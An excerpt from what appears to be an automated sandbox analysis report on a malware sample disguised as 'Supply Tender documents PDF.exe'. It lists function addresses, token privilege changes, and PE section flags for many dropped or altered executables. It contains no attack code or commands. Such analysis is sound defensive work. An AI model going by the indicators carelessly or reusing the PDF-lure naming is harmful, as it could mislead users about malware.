Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0333EA80	5_2_0333EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03356962	5_2_03356962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033429A0	5_2_033429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0340A9A6	5_2_0340A9A6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0334A840	5_2_0334A840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03342840	5_2_03342840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033268B8	5_2_033268B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0336E8F0	5_2_0336E8F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03360F30	5_2_03360F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033E2F30	5_2_033E2F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03382F28	5_2_03382F28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033B4F40	5_2_033B4F40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033BEFA0	5_2_033BEFA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0334CFE0	5_2_0334CFE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03332FC8	5_2_03332FC8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033FEE26	5_2_033FEE26
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03340E59	5_2_03340E59
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03352E90	5_2_03352E90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033FCE93	5_2_033FCE93
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033FEEDB	5_2_033FEEDB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033DCD1F	5_2_033DCD1F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0334AD00	5_2_0334AD00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03358DBF	5_2_03358DBF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0333ADE0	5_2_0333ADE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03340C00	5_2_03340C00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033E0CB5	5_2_033E0CB5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03330CF2	5_2_03330CF2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033F132D	5_2_033F132D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0332D34C	5_2_0332D34C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0338739A	5_2_0338739A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033452A0	5_2_033452A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033E12ED	5_2_033E12ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0335B2C0	5_2_0335B2C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0340B16B	5_2_0340B16B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0332F172	5_2_0332F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0337516C	5_2_0337516C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0334B1B0	5_2_0334B1B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033F70E9	5_2_033F70E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033FF0E0	5_2_033FF0E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033EF0CC	5_2_033EF0CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033470C0	5_2_033470C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033FF7B0	5_2_033FF7B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03385630	5_2_03385630
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033F16CC	5_2_033F16CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033F7571	5_2_033F7571
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_034095C3	5_2_034095C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033DD5B0	5_2_033DD5B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033FF43F	5_2_033FF43F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03331460	5_2_03331460
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033FFB76	5_2_033FFB76
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0335FB80	5_2_0335FB80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033B5BF0	5_2_033B5BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0337DBF9	5_2_0337DBF9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033B3A6C	5_2_033B3A6C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033FFA49	5_2_033FFA49
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033F7A46	5_2_033F7A46
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033DDAAC	5_2_033DDAAC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03385AA0	5_2_03385AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033E1AA3	5_2_033E1AA3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033EDAC6	5_2_033EDAC6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033D5910	5_2_033D5910
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03349950	5_2_03349950
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0335B950	5_2_0335B950
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033AD800	5_2_033AD800
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033438E0	5_2_033438E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033FFF09	5_2_033FFF09
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033FFFB1	5_2_033FFFB1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03341F92	5_2_03341F92
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03303FD2	5_2_03303FD2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03303FD5	5_2_03303FD5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03349EB0	5_2_03349EB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033F7D73	5_2_033F7D73
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033F1D5A	5_2_033F1D5A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03343D40	5_2_03343D40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0335FDC0	5_2_0335FDC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033B9C32	5_2_033B9C32
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_033FFCF2	5_2_033FFCF2

Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe

Process token adjusted: Load Driver

Jump to behavior

Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe

Process token adjusted: Security

Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 0332B970 appears 280 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03375130 appears 58 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 033AEA12 appears 86 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 033BF290 appears 105 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03387E54 appears 111 times
Source: C:\Users\user\Desktop\Supply Tender documents PDF.exe	Code function: String function: 00407DE1 appears 35 times
Source: C:\Users\user\Desktop\Supply Tender documents PDF.exe	Code function: String function: 00428900 appears 42 times
Source: C:\Users\user\Desktop\Supply Tender documents PDF.exe	Code function: String function: 00420AE3 appears 70 times

Source: setup.exe.1.dr	Static PE information: Resource name: RT_STRING type: DOS executable (COM, 0x8C-variant)
Source: setup.exe.1.dr	Static PE information: Resource name: RT_STRING type: DOS executable (COM, 0x8C-variant)
Source: updater.exe.1.dr	Static PE information: Resource name: RT_STRING type: CLIPPER COFF executable (VAX #) not stripped - version 71

Source: setup.exe0.1.dr	Static PE information: Number of sections : 13 > 10
Source: elevation_service.exe0.1.dr	Static PE information: Number of sections : 12 > 10
Source: pwahelper.exe0.1.dr	Static PE information: Number of sections : 12 > 10
Source: msedge_proxy.exe.1.dr	Static PE information: Number of sections : 12 > 10
Source: os_update_handler.exe.1.dr	Static PE information: Number of sections : 12 > 10
Source: setup.exe.1.dr	Static PE information: Number of sections : 14 > 10
Source: notification_helper.exe.1.dr	Static PE information: Number of sections : 11 > 10
Source: msedgewebview2.exe.1.dr	Static PE information: Number of sections : 14 > 10
Source: pwahelper.exe.1.dr	Static PE information: Number of sections : 12 > 10
Source: msedge_pwa_launcher.exe.1.dr	Static PE information: Number of sections : 13 > 10
Source: firefox.exe.1.dr	Static PE information: Number of sections : 11 > 10
Source: identity_helper.exe.1.dr	Static PE information: Number of sections : 12 > 10
Source: ie_to_edge_stub.exe.1.dr	Static PE information: Number of sections : 11 > 10
Source: msedge_proxy.exe0.1.dr	Static PE information: Number of sections : 12 > 10
Source: notification_click_helper.exe.1.dr	Static PE information: Number of sections : 13 > 10

Source: Supply Tender documents PDF.exe, 00000000.00000003.1154227405.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameALG.exej% vs Supply Tender documents PDF.exe
Source: Supply Tender documents PDF.exe, 00000000.00000003.1149554399.0000000003EC0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamearmsvc.exeN vs Supply Tender documents PDF.exe

Source: Supply Tender documents PDF.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: Supply Tender documents PDF.exe	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: armsvc.exe.0.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: alg.exe.0.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: mouslingly.exe.0.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AppVClient.exe.0.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: setup.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: notification_helper.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: jaureg.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: jucheck.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: jusched.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: java.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: javaw.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: javaws.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: jabswitch.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: os_update_handler.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: java-rmi.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: chrome_proxy.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: java.exe0.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: crashreporter.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: javacpl.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: default-browser-agent.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: firefox.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: maintenanceservice.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: minidump-analyzer.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: pingsender.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: plugin-container.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: FXSSVC.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: private_browsing.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: elevation_service.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: updater.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: elevation_service.exe0.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: maintenanceservice.exe0.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: msdtc.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: javaw.exe0.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: javaws.exe0.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: jjs.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: jp2launcher.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: keytool.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: kinit.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: klist.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: ktab.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: orbd.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: pack200.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: DiagnosticsHub.StandardCollector.Service.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: msiexec.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: PerceptionSimulationService.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: perfhost.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: Locator.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: MsSense.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: SensorDataService.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: policytool.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: rmid.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: rmiregistry.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: servertool.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: ssvagent.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: tnameserv.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: unpack200.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: ie_to_edge_stub.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: cookie_exporter.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: identity_helper.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: snmptrap.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: Spectrum.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: ssh-agent.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: TieringEngineService.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AgentService.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: vds.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: VSSVC.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: wbengine.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: setup.exe0.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: msedgewebview2.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: msedge_proxy.exe.1.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
